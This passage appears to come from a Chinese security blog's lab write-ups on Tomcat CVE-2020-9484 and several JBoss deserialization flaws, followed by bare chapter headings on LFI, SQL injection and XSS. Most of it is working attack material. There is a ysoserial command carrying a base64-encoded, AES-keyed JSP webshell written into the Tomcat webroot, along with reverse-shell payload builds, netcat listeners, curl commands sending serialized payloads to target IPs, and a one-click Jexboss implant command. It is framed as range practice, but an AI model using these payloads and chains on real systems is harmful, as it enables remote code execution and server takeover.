1java -jar ysoserial-all.jar Groovy1 "echo PCUhIFN0cmluZyB4Yz0iM2M2ZTBiOGE5YzE1MjI0YSI7IGNsYXNzIFggZXh0ZW5kcyBDbGFzc0xvYWRlcntwdWJsaWMgWChDbGFzc0xvYWRlciB6KXtzdXBlcih6KTt9cHVibGljIENsYXNzIFEoYnl0ZVtdIGNiKXtyZXR1cm4gc3VwZXIuZGVmaW5lQ2xhc3MoY2IsIDAsIGNiLmxlbmd0aCk7fSB9cHVibGljIGJ5dGVbXSB4KGJ5dGVbXSBzLGJvb2xlYW4gbSl7IHRyeXtqYXZheC5jcnlwdG8uQ2lwaGVyIGM9amF2YXguY3J5cHRvLkNpcGhlci5nZXRJbnN0YW5jZSgiQUVTIik7Yy5pbml0KG0/MToyLG5ldyBqYXZheC5jcnlwdG8uc3BlYy5TZWNyZXRLZXlTcGVjKHhjLmdldEJ5dGVzKCksIkFFUyIpKTtyZXR1cm4gYy5kb0ZpbmFsKHMpOyB9Y2F0Y2ggKEV4Y2VwdGlvbiBlKXtyZXR1cm4gbnVsbDsgfX0lPjwldHJ5e2J5dGVbXSBkYXRhPW5ldyBieXRlW0ludGVnZXIucGFyc2VJbnQocmVxdWVzdC5nZXRIZWFkZXIoIkNvbnRlbnQtTGVuZ3RoIikpXTtqYXZhLmlvLklucHV0U3RyZWFtIGlucHV0U3RyZWFtPSByZXF1ZXN0LmdldElucHV0U3RyZWFtKCk7aW50IF9udW09MDt3aGlsZSAoKF9udW0rPWlucHV0U3RyZWFtLnJlYWQoZGF0YSxfbnVtLGRhdGEubGVuZ3RoKSk8ZGF0YS5sZW5ndGgpO2RhdGE9eChkYXRhLCBmYWxzZSk7aWYgKHNlc3Npb24uZ2V0QXR0cmlidXRlKCJwYXlsb2FkIik9PW51bGwpe3Nlc3Npb24uc2V0QXR0cmlidXRlKCJwYXlsb2FkIixuZXcgWCh0aGlzLmdldENsYXNzKCkuZ2V0Q2xhc3NMb2FkZXIoKSkuUShkYXRhKSk7fWVsc2V7cmVxdWVzdC5zZXRBdHRyaWJ1dGUoInBhcmFtZXRlcnMiLCBkYXRhKTtPYmplY3QgZj0oKENsYXNzKXNlc3Npb24uZ2V0QXR0cmlidXRlKCJwYXlsb2FkIikpLm5ld0luc3RhbmNlKCk7amF2YS5pby5CeXRlQXJyYXlPdXRwdXRTdHJlYW0gYXJyT3V0PW5ldyBqYXZhLmlvLkJ5dGVBcnJheU91dHB1dFN0cmVhbSgpO2YuZXF1YWxzKGFyck91dCk7Zi5lcXVhbHMocGFnZUNvbnRleHQpO2YudG9TdHJpbmcoKTtyZXNwb25zZS5nZXRPdXRwdXRTdHJlYW0oKS53cml0ZSh4KGFyck91dC50b0J5dGVBcnJheSgpLCB0cnVlKSk7fSB9Y2F0Y2ggKEV4Y2VwdGlvbiBlKXt9JT4= | base64 -d > /usr/local/tomcat/webapps/ROOT/passkeybase64d.jsp" > passkeybase64d.session

注意/usr/local/tomcat/webapps/ROOT/ 为本次演示靶机的tomcat运行目录，tomcat8080页面运行目录一般在/webapps/ROOT/下，请注意路径可访问。演示时上传成功后不会执行，存在问题。

武器化

在可以运行Java8的攻击机上运行以下命令，已经添加了代理访问Github快速。

1cd /opt && git clone https://mirror.ghproxy.com/https://github.com/frohoff/ysoserial
2
3cd /opt/ysoserial && wget https://mirror.ghproxy.com/https://github.com/frohoff/ysoserial/releases/download/v0.0.6/ysoserial-all.jar -O ysoserial-master.jar
4
5cd /opt && git clone https://mirror.ghproxy.com/https://github.com/PenTestical/CVE-2020-9484 && cd CVE-2020-9484/ && chmod +x CVE-2020-9484.sh

1vim CVE-2020-9484.sh # remote_ip="10.10.15.108" 你的攻击机公网ip # change this
2nc -nvlp 4444
3cd /tmp && python3 -m http.server 80
4./CVE-2020-9484.sh target-ip

这个利用的是上传漏洞，要有上传页面，upload.jsp。

参考链接

样例目录Session泄露

很鸡肋 </examples/servlets/servlet/SessionExample> 目录下有session会话模板，可以利用。

参考链接

https://saucer-man.com/information_security/507.html

https://blog.csdn.net/qq_48985780/article/details/121421440

Jobss漏洞 CVE-2017-12149 CVE-2015-7501 CVE-2017-7504

Thu, 08 Aug 2024 16:13:45 +0000

jboss 代码执行 (CVE-2017-12149)

影响范围

1JBoss 5.x/6.x

漏洞原理

在/invoker/readonly路径下，攻击者可以构造序列化代码传入服务器进行反序列化,由于没有对反序列化操作进行任何检测，导致攻击者可以执行任意代码该漏洞位于JBoss的HttpInvoker组件中的 ReadOnlyAccessFilter 过滤器中，其doFilter方法在没有进行任何安全检查和限制的情况下尝试将来自客户端的序列化数据流进行反序列化，导致攻击者可以通过精心设计的序列化数据来执行任意代码

漏洞复现

启动 https://vulfocus.cn/ 靶场环境

访问 /invoker/readonly 如果返回500，说明此页面就可能存在反序列化漏洞。

直接用CVE工具利用

靶场 flag-{bmh7cbffb27-ed9a-4c74-8929-0b6df905cc8a}

反弹shell的POC

下载工具后进入目录http://scan.javasec.cn/java/JavaDeserH2HC.zip

攻击机下载执行执行生成二进制payload文件：

1javac -cp .:commons-collections-3.2.1.jar ReverseShellCommonsCollectionsHashMap.java

修改接收shell的IP和端口：

1java -cp .:commons-collections-3.2.1.jar ReverseShellCommonsCollectionsHashMap 攻击机IP:7777

不要管报错

NC开启监听：

1nc -vv -l -p 7777

向靶机发起攻击Payload：

1curl http://123.58.224.8:26968/invoker/readonly --data-binary @ReverseShellCommonsCollectionsHashMap.ser

反弹成功

取得flag

JBoss JMXInvokerServlet 反序列化漏洞（CVE-2015-7501）

影响版本

 1Red Hat JBoss A-MQ 6.x版本；
 2BPM Suite (BPMS) 6.x版本；
 3BRMS 6.x版本和5.x版本；
 4Data Grid (JDG) 6.x版本；
 5Data Virtualization (JDV) 6.x版本和5.x版本；
 6Enterprise Application Platform 6.x版本，5.x版本和4.3.x版本；
 7Fuse 6.x版本；
 8Fuse Service Works (FSW) 6.x版本；
 9Operations Network (JBoss ON) 3.x版本；
10Portal 6.x版本；
11SOA Platform (SOA-P) 5.x版本；
12Web Server (JWS) 3.x版本；
13Red Hat OpenShift/xPAAS 3.x版本；
14Red Hat Subscription Asset Manager 1.3版本。

漏洞原理1

JBoss在 /invoker/JMXInvokerServlet 请求中读取了用户传入的对象，然后我们可以利用 Apache Commons Collections 中的 Gadget 执行任意代码。

漏洞复现1

如果嫩下载JMXInvokerServlet文件就存在漏洞。

1git clone https://github.com/ianxtianxt/CVE-2015-7501/
2cd CVE-2015-7501/
3javac -cp .:commons-collections-3.2.1.jar ReverseShellCommonsCollectionsHashMap.java
4java -cp .:commons-collections-3.2.1.jar ReverseShellCommonsCollectionsHashMap 攻击机IP:7777
5nc -vv -l -p 7777
6curl http://123.58.224.8:55153/invoker/readonly --data-binary @ReverseShellCommonsCollectionsHashMap.ser

_flag=flag-{bmh30a69994-5535-4de1-b53d-5c36c0d0498e}

JBoss EJBInvokerServlet 反序列化漏洞

跟CVE-2015-7501利⽤⽅法⼀样，只是路径不⼀样，这个漏洞利⽤路径是

/invoker/EJBInvokerServlet

JBossMQJMS 反序列化漏洞（CVE-2017-7504）

影响版本2

JBoss <=4.x

漏洞原理2

JbossMQ实现过程的JMS over HTTP Invocation Layer的HTTPServerILServlet.java文件存在反序列化漏洞，远程攻击者可借助特制的序列化数据利用该漏洞执行任意代码。

漏洞复现2

访问 /jbossmq-httpil/HTTPServerILServlet 返回This is the JBossMQ HTTP-IL，说明存在反序列化漏洞。

利用工具:JavaDeserH2HC

https://github.com/joaomatosf/JavaDeserH2HC

1javac -cp .:commons-collections-3.2.1.jar ReverseShellCommonsCollectionsHashMap.java
2java -cp .:commons-collections-3.2.1.jar ReverseShellCommonsCollectionsHashMap 攻击机:7777
3nc -vv -l -p 7777
4curl http://123.58.224.8:47973/jbossmq-httpil/HTTPServerILServlet --data-binary @ReverseShellCommonsCollectionsHashMap.ser

flag-{bmh93d53260-14f8-4405-91cd-f4221ef65f3f}

Jexboss 工具一键植入

1python jexboss.py -u http://123.58.224.8:47973/

特殊情况

Windows主机无法反弹shell。

参考链接

https://mp.weixin.qq.com/s/IVVftRRofmGQaE52m4SAyQ

漏洞分析 on 静静的安全笔记

Day27 目录遍历、文件包含与SQL注入漏洞

目录遍历漏洞（Directory Traversal Vulnerabilities）

识别和利用目录遍历​​

练习​​

文件包含漏洞（File Inclusion Vulnerabilities）

识别文件包含漏洞

利用本地文件包含(LFI)

污染日志文件

LFI代码执行

练习

远程文件包含(RFI)

RFI技巧

Webshell说明

练习

扩展你的技能库

HTTP服务器替代方案

Python 2.x

Python 3.x

PHP

Ruby

BusyBox

PHP包装器

使用Data包装器

使用Data包装器执行PHP代码

练习

方法1 反弹shell

方法2：写入shell后LFI

Sql注入

基本 SQL 语法

识别 SQL 注入漏洞

身份验证绕过

枚举数据库

列数枚举

理解输出的布局

从数据库中提取数据

练习

从 SQL 注入到代码执行

练习

自动化 SQL 注入

练习

第九章总结

Day26 Web漏洞-XSS跨站脚本

​上一节补充​核心知识点：Burp Suite 处理动态 Token 的流程​

​​1. 问题分析​​

​​2. 解决方案：Burp Intruder 的宏（Macro）功能​​

​​3. 配置步骤​

​​Step 1: 设置攻击位置（Positions）​​

​​Step 2: 配置 Payloads（递归提取动态值）​​

​​Step 3: 配置密码爆破（Payload Set 3）​​

​​4. 核心技术：宏 Macros 如何工作​​

​​5. 成功关键点​​

​​6. 替代方案（Burp 的 Session Handling Rules）​​

XSS漏洞

​核心安全概念：数据消毒（Data Sanitization）​​

​​跨站脚本攻击（XSS）​​

​​漏洞类型​​

​​漏洞检测方法​​

​​XSS利用技术实战​​

​​基础攻击示例​​

​​进阶利用：会话劫持​​

​​防御措施​​

​​技术关键点解析​​

9.4.2.5 练习

​​1. 利用XSS漏洞获取管理员Cookie并劫持会话的步骤​​

​​2. XSS漏洞的其他攻击利用方式​​

​​3. XSS漏洞的攻击目标：客户端而非服务器​​

​​防御措施关键点​​

Day24 Web程序漏洞测试工具

Web程序漏洞测试工具

目录遍历

🔍 目录爆破工具全景图

⚙️ 高级用法实战手册

1. DirB - 内网渗透利器

2. GoBuster - 云环境克星

3. DirSearch - 精确打击专家

🚀 替代方案

1. FFuf - 速度之王

2. FeroxBuster - 深度递归专家

3. Wfuzz - 高级逻辑爆破

识别和利用目录遍历

练习

上一节补充核心知识点：Burp Suite 处理动态 Token 的流程

1. 问题分析

2. 解决方案：Burp Intruder 的宏（Macro）功能

3. 配置步骤

Step 1: 设置攻击位置（Positions）

Step 2: 配置 Payloads（递归提取动态值）

Step 3: 配置密码爆破（Payload Set 3）

4. 核心技术：宏 Macros 如何工作

5. 成功关键点

6. 替代方案（Burp 的 Session Handling Rules）

核心安全概念：数据消毒（Data Sanitization）

跨站脚本攻击（XSS）

漏洞类型

漏洞检测方法

XSS利用技术实战

基础攻击示例

进阶利用：会话劫持

防御措施

技术关键点解析

1. 利用XSS漏洞获取管理员Cookie并劫持会话的步骤

2. XSS漏洞的其他攻击利用方式

3. XSS漏洞的攻击目标：客户端而非服务器

防御措施关键点

🔧 Burp Suite 基础安装配置

🔐 HTTPS抓包解决方案

🛠️ 核心功能模块

⚡ 高效操作技巧

📌 重要注意事项

🔍 Nikto 使用指南

⚙️ 基础使用命令

1. 最小化扫描（快速启动）

2. 控制扫描时间

3. 精细调优检测项

4. 绕过基础防护

📊 实战输出解析示例

⚠️ 使用注意事项

🛠️ 进阶组合技巧

💎 总结

1. davtest

2. nuclei

3. skipfish

4. wapiti

5. whatweb

6. wpscan

【POC未成功控制】Windows 远程桌面授权服务远程代码执行漏洞 CVE-2024-38077 漏洞狂躁许可（MadLicense）